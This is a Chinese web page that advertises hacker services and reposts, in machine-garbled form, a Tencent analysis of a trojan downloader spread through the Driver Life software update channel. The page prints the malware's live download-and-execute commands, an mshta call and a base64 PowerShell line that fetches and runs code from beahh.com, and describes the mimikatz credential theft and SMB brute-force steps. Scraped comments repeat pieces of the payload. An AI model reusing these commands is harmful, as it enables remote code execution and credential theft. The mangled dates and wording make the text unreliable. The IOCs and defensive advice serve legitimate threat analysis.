黑客业务

黑客服务,入侵网站,网站入侵,黑客技术,信息安全,web安全

黑客格言,曾行使驱动人生升级通道流传的木马下载器再次升级

       

Shade(幽灵)勒索病毒再次袭击,入侵2000多个CMS网站肆意传播

1月25日,御见威胁情报中心再次监控木马下载器再次升级,驱动人生升级通道流通。升级的主要变化是攻击模块。            

   一、概述    

   

   御见威胁情报中心125日本再次监控木马下载器再次升级,驱动人生升级通道流通。

   

   这次升级的主要变化是攻击模块,木马在之前的版本中增加了新的计划任务DnsScan其中,永恒蓝攻击模块C:\Windows\Temp\svchost.exe设置为木马执行当天7:05首先,每小时执行一次。

   

   
   

   

   木马团伙持续活跃,最严重的损坏是入侵驱动生活公司,改变商业软件的升级设置,行使正式软件的升级通道传播病毒。在相关公司堵塞木马传输通道后,该团伙行使其他传输通道不断改进木马下载器。    

   

   该团伙的历次流动,均被腾讯御见威胁情报中心捕捉:

                                           

   时间    

                       

   木马下载器的主要行为转变    

                                               

   20181214    

                       

   行使驱动人生发布系列软件升级通道,行使永恒之蓝破绽攻击流传。    

                                               

   20181219    

                       

   下发后新增木马Powershell后门安装。    

                                               

   2019109    

                       

   检测挖掘组件xmrig-32.mlz/xmrig-64.mlz下载。    

                                               

   2019124    

                       

   木马将采矿组件和升级后门组件分别安装为计划任务,并同时安装Powershell后门。    

                                               

   2019125    

                       

   木马在124在日的基础上再次更新,将攻击组件安装为计划任务,并在攻击过程中增加行使mimikatz收集登录密码,SMB同时安装弱口令爆破攻击Powershell计划任务和mshta剧本计划任务。    

                               

   以下是详细的工艺分析:

   

       

   

   二、工艺分析

   

   更新后的攻击模块svchost.exe除了对内网和外网机械进行扫描攻击外,还增加了以下功能:    

   

       

   

   1、行使powershell版黑客工具mimikatz抓取用户机械登录密码。    

   

   建立m.ps1混淆后mimikatz写入工具代码。    

   

       

   

   
   

   

   保存行使工具捕获的用户登录密码mkatz.ini    

   

       

   

   
   

   

   2、通过内置弱密码字典实验攻击模块实验SMB远程登录爆破。    

   

       

   

   
   

   

   3、建立计划任务远程执行hta代码    

   

   mshta hxxp://w.beahh.com/page.html?p%COMPUTERNAME%

   

       

   

   
   

   

   4.建立远程执行计划任务的计划powershell代码    

   

   powershell-epbypass-eSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=

   

   powershell下令解密后内容如下:    

   

   IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v' $env:USERDOMAIN)

   

       

   

   三、安全建议    

   

   1.服务器暂时关闭不必要的端口(如135139445),方式可参考:https://guanjia.qq.com/web_clinic/s8/585.html    

   

   2.服务器使用高强度密码,不要使用弱密码,防止黑客暴力破解;    

幽灵勒索病毒大量入侵内容管理网站 腾讯安全支招防御

   

   3.使用杀毒软件阻止可能的病毒攻击;    

   

   4.建议企业用户部署腾讯皇家高级威胁检测系统,以防止可能的黑客攻击。皇家高级威胁检测系统是基于腾讯反病毒实验室的安全能力,基于腾讯在云和端的大量数据,开发奇怪的威胁情报和恶意检测模子系统    

       
   

       

   

   IOCs    

   

   Domain

   

   v.beahh.com

   

   w.beahh.com

   

   Md5

   

   cce36235a525858eb55070847296c4c8

   

   34410a21398137d71258e2658ecddaeb

   

   4cb4ccfd1086fc78d2a1a063862bff41

   

   65d17d790098fdff32c96bce0be6645e

   

   7f8dde92700f5013b4ed23c6ec5b7337

   

   8bf4cfe6d0938cd8a618e3a4cd32c79d

   

   a56a29ddff74c1b536fa5c97863f0d35

   

   ae4b536a5b7c6d6decc7e96591ce67f8

   

   b73dfc81a367f4dfa44bb209ed9e5e67

   

   c85cb83a850b4ccd2d2232a4d356d607

   

   f6cd992c002be66c01ea2e16e3cd4df2

   

   f75f0261296a8b7b81f54a076c58439c

   

   fd38cca1e2fa4a7d14a2943b3ad5d20c

   

   URL

   

   hxxp://v.beahh.com/v

   

   hxxp://w.beahh.com/page.html

   

   参考链接:    

   

       

   

   挖矿木马预警永恒蓝破绽传播    

   

   https://mp.weixin.qq.com/s/xBx5tOl9LJmWurqgD8KYhQ

   

   
   

   

   驱动生活升级通道传木马完整工艺分析    

   

   https://mp.weixin.qq.com/s/XmEalNxxQ3kAySDvIVTDOw

   

   
   

   

   对驱动人生公司的定向攻击流动分析    

   

   https://mp.weixin.qq.com/s/ctBgivcvH216dwq00WRmOA

   

   
   

   

       

   

   行使驱动人生升级通道的木马下载器发生了新的变化    

   

   https://media.weibo.cn/article?id=2309404319028930855515

   

   
   

   

   驱动人生永恒蓝下载器木马的最新变化(1月25日更新)

   

   
   

   

   https://guanjia.qq.com/news/n3/2473.html

   

   
   

   

   如何关闭不必要的端口(如135139445    

   

   https://guanjia.qq.com/web_clinic/s8/585.html

小心恶意改写硬盘分区的破坏性病毒

   
  • 评论列表:
  •  俗野冧九
     发布于 2022-05-29 16:43:40  回复该评论
  • AUwBFAFIARABPAE0AQQBJAE4AKQA=        powershell下令解密后内容如下:            IEX (New-Object Net.WebClient)
  •  酒奴做啡
     发布于 2022-05-29 09:09:29  回复该评论
  • a.qq.com/web_clinic/s8/585.html            2.服务器使用高强度密码,不要使用弱密码,防止黑客暴力破解;    幽灵勒索病毒大量入侵内容管理网站 腾讯安全支招防御        3.使用杀毒软件阻止可能的病毒攻击;    
  •  澄萌池鱼
     发布于 2022-05-29 09:27:49  回复该评论
  • z下载。                                                        2019年1月24日                                木马将采矿组件和升级后门组件分别安装为计划任务,并同
  •  弦久觅遇
     发布于 2022-05-29 12:36:26  回复该评论
  • AAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=        powershell下令解密后内容如下:            I

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.